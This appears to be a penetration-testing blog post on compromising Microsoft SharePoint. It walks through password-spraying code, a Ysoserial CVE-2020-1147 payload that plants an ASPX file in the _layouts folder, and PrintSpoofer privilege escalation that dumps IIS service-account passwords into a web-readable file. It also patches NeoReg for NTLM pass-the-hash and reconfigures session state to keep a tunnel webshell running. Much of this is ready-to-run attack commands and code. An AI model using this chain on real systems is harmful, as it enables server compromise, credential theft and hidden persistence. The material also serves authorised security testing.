Hello dear friends. Today we are going to explore some particular cases you may run into when targeting Sharepoint instances during Pentests/Red Team exercises. When I faced this suite for the first time, I noticed that there is a lot of useful information out there, but it is spread among multiple sources, so I wanted to share my own compilation combined with my research work.

As you may know, Microsoft Sharepoint is a web-based collaborative platform that integrates with Microsoft Office. Primarily sold as a document management and storage system, the product is highly configurable and its usage varies substantially among organizations. Focusing on what interests us here, this is a web-driven suite usually accessed by authenticated corporate users and known to suffer from a myriad of reported CVEs if not patched. Several of these lead to Remote Code Execution (RCE) and ultimately allow attackers to compromise the server instance. Sounds like a good target to compromise.

However, the complete exploitation process is not always straightforward, and we may run into difficulties when trying to escalate privileges or set up persistence implants. We will go into detail in the following sections.

Intel Report

First of all, let's explore the latest RCE issues whose exploitation process has been publicly documented:

As you may have noticed, all of these vulnerabilities can provide command execution to attackers, but they require authenticated access by default. Since most Sharepoint instances are connected to Active Directory and we assume no access to the complete list of users, the most suitable approach in this case is user gathering from OSINT resources followed by Password Spraying against authenticated Sharepoint endpoints. Another option is to fuzz endpoints using specific wordlists such as SecLists and look for unauthenticated content, hopefully finding vulnerable endpoints or information disclosure issues involving AD users. This has already happened in real cases, such as with the U.S. Dept of Defense.
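The spraying approach above benefits from a lockout-aware schedule: one password is tried across every user per round, with a long pause between rounds. A minimal sketch in Python (usernames and passwords are made up for illustration):

```python
def spray_rounds(users, passwords):
    """Yield one spraying round per candidate password.

    A single password is tried against the whole user list before
    moving to the next one, so each account only accumulates one
    failed attempt per round and lockout thresholds are not reached.
    """
    for password in passwords:
        yield password, list(users)

users = ["john.doe", "jane.roe"]           # hypothetical AD usernames
passwords = ["Winter2020!", "Company123"]  # hypothetical candidate passwords

rounds = list(spray_rounds(users, passwords))
# Between real rounds you would sleep past the lockout observation
# window (e.g. 30+ minutes) before sending the next password.
```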

We won't go into much detail about user gathering. I just want to note the obvious but most important thing: the more complete the user list is, the greater the chances of getting in. At this point you surely have the basic information to build a good user list: the user syntax (name.surname, n_surname, etc.) disclosed in metadata, and user databases (company website or directories, LinkedIn, search engines, etc).
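Turning the disclosed syntax into candidates is easy to script. The formats below are hypothetical examples; keep only the one that matches the metadata you actually found:

```python
def candidate_usernames(first, last):
    """Build common corporate username syntaxes for one person."""
    f, l = first.lower(), last.lower()
    return [
        f"{f}.{l}",     # name.surname
        f"{f[0]}_{l}",  # n_surname
        f"{f[0]}{l}",   # nsurname
        f"{f}.{l[0]}",  # name.s
    ]

# Feed the output to your spraying tool, one line per candidate.
candidates = candidate_usernames("John", "Doe")
```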

Dorks in search engines are quite powerful. Used wisely, they can serve you well not only for user enumeration, but also for endpoint discovery. Some instances host more than one site, and they are not necessarily configured the same way.

Endpoint discovery using dorks.

Once we get authenticated access, we can proceed with the exploitation itself.

Pwning Sharepoint from your home

For the sake of simplicity, we are going to work with CVE-2020-1147 as implemented in Ysoserial.NET, a fantastic tool to craft .NET serialized gadgets with custom payloads.

Ysoserial's SharePoint payloads.

There are a couple of ways to check whether an asynchronous blind RCE succeeded. We can issue web requests with a custom domain pointing to our server and see if they reach it. We can even set up a DNS domain whose authoritative server we control, to see whether DNS requests leak in case HTTP requests are not being received.
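A minimal sketch of the HTTP side of that check, assuming you control a host the target can reach (the bind address and canary paths are placeholders):

```python
import http.server
import threading

hits = []  # canary paths received back from the target

class CanaryHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        hits.append(self.path)   # record which payload called back
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the console quiet

def start_canary(address="127.0.0.1", port=0):
    """Serve on a background thread; returns (server, bound_port)."""
    server = http.server.HTTPServer((address, port), CanaryHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]
```

In the serialized payload you would then run something like `curl http://<your-host>/canary-1147` and watch the hits list; the DNS variant works the same way, only at the resolver level.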

The _layouts folder trick

If none of these methods work, we can try to write a proof file into one of the web directories and check its existence. Although default Sharepoint configurations don't allow write access to web folders, sometimes sysadmins relax these restrictions to meet application requirements, so it is worth trying.

A bit of research revealed that Sharepoint does not serve web files directly. However, there are some special cases, such as the _layouts folder, where files can be requested directly. The best part of using this folder is that its ASPX files are not subject to the restrictions applied to user pages, which are stored in the database and are unable to use code blocks or include files from the file system, as already explained in CVE-2020-1181.

From now on, all practical explanations will be based on the testing Sharepoint 2016 VM available here. We will try to upload some test code to check whether we can write into the _layouts folder as the current IIS Pool user.

<%@ Import Namespace="Microsoft.SharePoint" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head></head>
<body>
<%= "testprint" %>
</body>
</html>

The _layouts folder is located at C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS in the file system (note that the 16 folder is version-dependent; in this case it matches Sharepoint 2016), so our proof file will be written as proof.aspx inside it. We launch Ysoserial.NET using the following command:

.\ysoserial.exe -p Sharepoint --cve=CVE-2020-1147 -c 'echo ^<^%@^ Import^ Namespace="Microsoft.SharePoint"^ ^%^>^ ^ ^<^!DOCTYPE^ html^ PUBLIC^ "-//W3C//DTD^ XHTML^ 1.0^ Strict//EN"^ "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"^>^ ^<html^>^ ^<head^>^</head^>^ ^<body^>^ ^<^%=^ "testprint"^ ^%^>^ ^</body^>^ ^</html^> > "C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\proof.aspx"'
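Escaping payloads like this by hand is error-prone, so here is a small helper that reproduces the caret-escaping used in the command above (the helper names and the exact escaped character set are my own choices, mirroring what the manual command escapes plus cmd's other metacharacters):

```python
def caret_escape(payload):
    """Caret-escape a payload so cmd.exe's echo emits it literally.

    The command above escapes <, >, % and spaces with ^; & | and ^
    itself are included as well since cmd treats them specially.
    """
    specials = set('<>%&|^ ')
    return "".join("^" + c if c in specials else c for c in payload)

def echo_to_file(payload, dest):
    # Full one-liner suitable for ysoserial's -c parameter.
    return f'echo {caret_escape(payload)} > "{dest}"'
```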

It is common practice to use the same Sharepoint instance for multiple sites mapped to different domains or subdomains. Another advantage of uploading ASPX files to _layouts is that we don't need to find the correct site, since all of them have access to this folder. In our example, one valid URL would be http://intranet.sp2016gm.dev/_layouts/15/proof.aspx:

Simple PoC demonstrating RCE.

This way we confirmed Code Execution capabilities, so we can proceed to the next step.

Domain accounts in Cl34rt3xt

But wait a minute... do we really need to PrivEsc? That's a fair question. If you managed to confirm code execution and HTTP outbound connectivity, probably the best way to continue is with a C2 HTTP implant. If your favourite C2 has proxy functionality, you may get nice persistence with command execution and traffic tunneling capabilities, making PrivEsc unnecessary.

However, if the server is unable to perform outbound connections, there are important sub-goals we can achieve after successful Privilege Escalation on a Sharepoint machine.

Privilege Escalation techniques in Windows are a wide topic, but when we face a well-configured Windows Server 2019 instance, things can get hard. Still, there is one technique that should work fine considering that our IIS Pool account probably has the SeImpersonatePrivilege privilege enabled: the PrintSpoofer bug.

It is worth mentioning that the Delegate 2 Thyself technique could also work, but the Sharepoint server must meet two requirements: it has to be joined to a Windows domain, and the Pool account must be a local service account. In my experience, IIS Pool accounts in Sharepoint instances are usually associated with domain user accounts, which makes this path unfeasible, but if you find a case where a local account is used (i.e. iis apppool\defaultapppool) you could give it a try.

To exploit the PrintSpoofer bug, you can get the PoC from itm4n's git repo or the SweetPotato project. The tool needs to be modified to avoid AV detections and then uploaded to the target, a process I will not cover here. Once the tool is ready, to confirm that the PrivEsc is working we are going to get the Pool account's plaintext password and write it into the layouts folder so we can read it even if no outbound connection is available. The basic appcmd command would be the following:

c:\windows\system32\inetsrv\appcmd.exe list apppool  /text:* | findstr "userName password" > "C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\share.js"

Remember that this command must be launched through the PrintSpoofer tool, wrapping the entire command in Ysoserial to trigger it through serialization as explained earlier. The output will be written into the layouts folder as a fake JS file named share.js. If everything went as expected, all the service accounts configured in IIS should be displayed when opening the dump file (remember to delete the file ASAP, and don't even try this in a customer's environment without encrypting these contents first).

Username and p4ssword extraction.
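appcmd prints attributes as name:"value" pairs, so pulling the accounts out of the dump can be scripted. A sketch (the sample string mimics the dump's shape, reusing the lab's sp_services account and password):

```python
import re

def parse_appcmd_dump(text):
    """Pair up userName/password attributes from filtered appcmd output."""
    users = re.findall(r'userName:"([^"]*)"', text)
    passwords = re.findall(r'password:"([^"]*)"', text)
    return list(zip(users, passwords))

# Shape of the share.js dump after the findstr filter (sample values).
sample = '''
    userName:"GMSP2016\\sp_services"
    password:"pass@word1"
'''
creds = parse_appcmd_dump(sample)
```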

At this point we should have both command execution and privilege escalation in place. If we didn't get a C2 implant with proxy capabilities working, we need to proceed with the Web Tunneling step.

Web Tunneling in overdrive

Originally, web tunnels were configured using customized versions of ReGeorg, which did a good job. This led people to create their own versions based on the original code, until some time ago a new project called Neo-Regeorg (NeoReg) appeared with a bunch of new functions and improvements.

Basic usage of NeoReg is pretty straightforward: one command generates the web files, encrypting their content with the specified key (useful against packet inspection).

$ python neoreg.py generate -k sup3rs3cr3tp4ss
[+] Mkdir a directory: neoreg_servers
    [+] Create neoreg server files:
       => neoreg_servers/tunnel.ashx
       => neoreg_servers/tunnel.aspx

The .aspx file is the one to be written into the layouts folder, now that we have privileges to do so. Once the web file is generated and uploaded to the target, the following command establishes the connection and sets up the proxy port on our local machine:

$ python3 neoreg.py -k sup3rs3cr3tp4ss -u http://intranet.sp2016gm.dev/_layouts/15/tunnel.aspx

However, there are two problems we are going to face if we try to use ReGeorg/NeoReg in a Sharepoint instance: NTLM Authentication and Session State.

NTLM Authentication

The first problem we face is web NTLM Authentication. Although there is a flag to add headers, which could be used to set a fixed Authorization header, in the case of NTLM this is not enough, as the header changes dynamically with its challenge-response model.

 $ python3 neoreg.py -k sup3rs3cr3tp4ss -u http://intranet.sp2016gm.dev/_layouts/15/tunnel.aspx
 Tunnel at:
[ERROR   ]  Georg is not ready, please check URL and KEY. rep: [401] Unauthorized

To fix this, we can implement a small piece of new functionality to handle NTLM authentication by taking advantage of the existing requests-ntlm2 Python library. It can be installed with pip:

pip install requests-ntlm2

In the Python client file neoreg.py we can use hardcoded credentials as a first approach to check whether it works. Only three lines are required to implement authentication using this library: the import statement at line 17 and the auth item itself at lines 720-721.

17.         from requests_ntlm2 import HttpNtlmAuth
717.        conn.headers['Accept-Encoding'] = 'gzip, deflate'
718.        conn.headers['User-Agent'] = USERAGENT
720.        auth=HttpNtlmAuth('gmsp2016.dev\\sp_services','pass@word1')
721.        conn.auth=auth

If for some reason the cleartext password is not known but we have the NTLM hash, it can be used directly. It is not a well-documented feature, but digging into the code shows that Pass the Hash is already implemented in this library. GitHub itself is a nice tool to trace code, as it is capable of matching function definitions between files.

We start by looking at the requests_ntlm2.py file until the first reference to header negotiation appears.

Reference in requests_ntlm2.py.

The next file to be inspected is dance.py inside the same project. The HttpNtlmContext class wraps its namesake in the ntlm_auth project, which this one is based on.

Reference in dance.py.

We move to the ntlm.py file in the original ntlm_auth project, referenced from HttpNtlmContext, until we see the next reference to the challenge authentication message, pointing to ntlm_auth/messages.py.

Reference in ntlm_auth/messages.py.

We reach the point where the username and password are processed, but we need deeper detail, which we can get from ntlm_auth/compute_response.py.

Reference in ntlm_auth/compute_response.py.

The compute_response.py file has another reference to the _ntowfv2 function in ntlm_auth/compute_hash.py.

Reference in ntlm_auth/compute_response.py.

Finally we reach the low-level detail in compute_hash.py, and here is where the magic happens. If the password string matches a full NTLM hash, no transformation is applied: the library just splits the LM and NT hashes and takes the latter.

Reference in ntlm_auth/compute_hash.py.

This operation takes place in the _ntowfv1 function, but if we take a look at _ntowfv2, which is the one we came from, we can see that it follows the same path, since it calls _ntowfv1 to get the digest.

The function _ntowfv2 points to _ntowfv1.
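The branch we just traced can be expressed in a few lines. This is an illustrative re-implementation of the detection logic, not the library's code; when the check fails, ntlm_auth instead computes MD4 over the UTF-16LE password:

```python
import re

# Full LM:NT pair as found in SAM dumps: two 32-hex-digit halves.
NTLM_HASH_RE = re.compile(r'^[a-fA-F0-9]{32}:[a-fA-F0-9]{32}$')

def nt_hash_or_none(password):
    """Return the NT half when `password` is already an LM:NT hash pair."""
    if NTLM_HASH_RE.match(password):
        return password.split(':')[1]  # pass the hash: used directly
    return None                        # normal password: would be MD4'd
```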

You can test it by putting the NTLM hash instead of the plaintext password in the authentication line.

720.     auth=HttpNtlmAuth('gmsp2016.dev\\sp_services','908E2A7188837309B262350F152C6028:BA03A114DEF8D5C913983436960E592C')

This is quite useful if you get NTLM hashes from SAM / LSASS dumps or the Internal Monologue Attack. Note that in the latter case, the NetNTLMv1 hash must be cracked to NTLM first.

Dealing with Session State

Authentication was the first obstacle, but another remains. ReGeorg/NeoReg needs a feature called Session State to store persistent information across web requests, such as the socket handlers used to proxy internal connections. Session State is enabled in most IIS configurations, but it comes disabled by default in Sharepoint instances.

One 'noob programmer' idea that came to my mind was to find a way of serializing the socket to pass this information to the Python client, then specifying the socket in each request so the server didn't have to remember it. Unfortunately, sockets are not serializable.

Knowing this, the only remaining option was to enable Session State. Prior consent from the customer will probably be required here, since we are going to change configuration parameters in a production environment. Sharepoint comes with its own Powershell cmdlets to make this kind of operation easier.

Add-PsSnapin Microsoft.SharePoint.PowerShell; Enable-SPSessionStateService -DefaultProvision

I should warn you that if you try to launch this command from Ysoserial payloads, the webshell, or even as SYSTEM with the Potato exploit, the server will deny your request with the following message:

<Objs Version="" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">Enable-SPSessionStateService : You need to have Farm administrator priviliges 

Fortunately, we have the SP_Farm account from the appcmd.exe output, so we can use it to solve the privilege issue. To impersonate the farm user in a non-interactive environment, the RunAsCs project can help us create an interactive process token (logon type 2) to launch the command without too much trouble. Note that the Powershell command has been encoded in Base64 to prevent issues with special chars and command line terminators.
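The exact RunAsCs invocation is omitted here, but the encoding step itself is simple: powershell.exe's -EncodedCommand flag expects Base64 over the UTF-16LE bytes of the command. A sketch:

```python
import base64

def encode_powershell(command):
    """Encode a command for powershell.exe -EncodedCommand."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

cmd = ("Add-PsSnapin Microsoft.SharePoint.PowerShell; "
       "Enable-SPSessionStateService -DefaultProvision")
encoded = encode_powershell(cmd)
# The result is passed as: powershell.exe -EncodedCommand <encoded>
```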


No output will be received from this command, but it could be modified to redirect STDOUT within the Powershell command and write it into a file so it can be checked later. If everything went fine, Session State should now be enabled in the Sharepoint instance.

There is one last thing to care about. As explained in the official Microsoft documentation:

"When you use a session-state mode other than InProc, the session-variable type must be either a primitive .NET type or serializable. This is because the session-variable value is stored in an external data store. For more information, see Session-State Modes."

Despite failing miserably when trying to serialize sockets, in the end I got valuable information. NeoReg will fail again if we try to use it right now, but now we know why: Session State is enabled with the external data store mode by default, which cannot handle socket serialization, so we must change it to the InProc mode. We can achieve this by adding the <sessionState> element to the web.config file corresponding to the Sharepoint app we are using:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<configuration>
  <system.web>
    <sessionState mode="InProc" timeout="25"></sessionState>
  </system.web>
</configuration>

Normally, Sharepoint servers handle web.config modifications automatically, so there is no need to restart any service. After that, NeoReg should finally work, allowing us to configure a proxy tunnel even on the loneliest Sharepoint. It's up to my dear reader which steps to take from here.

Be gentle.



In this post we have demonstrated that Sharepoint instances are attractive assets for attackers when exposed, even in cases where only the HTTP or HTTPS port is reachable and credentials are required. If this software is not properly patched, critical vulnerabilities can be leveraged by malicious actors to take control of the affected servers. Even though the vulnerabilities mentioned here are somewhat dated by now, there are high chances of finding instances that are not fully patched. Moreover, new CVEs will potentially be disclosed in the future, such as CVE-2021-1707, so the gates will remain open for this exploitation path.

C2 tools like Cobalt Strike are very suitable in cases where HTTP outbound connections are possible. They provide not only command execution, but also a lot of tooling that can be launched in-memory without privilege escalation, such as reverse proxies to tunnel into the internal network.

If we find the Lone Sharepoint with no outbound connectivity, it is still possible to set up persistence in the form of web-based applications. With a bit of extra effort, we have demonstrated that even Web Tunneling is possible in tough cases.



The contents explained in this article are oriented to academic purposes and must not be used without the customer's permission, or followed literally in real-life security projects. It's up to the reader to investigate how to adapt these cases to their particular needs.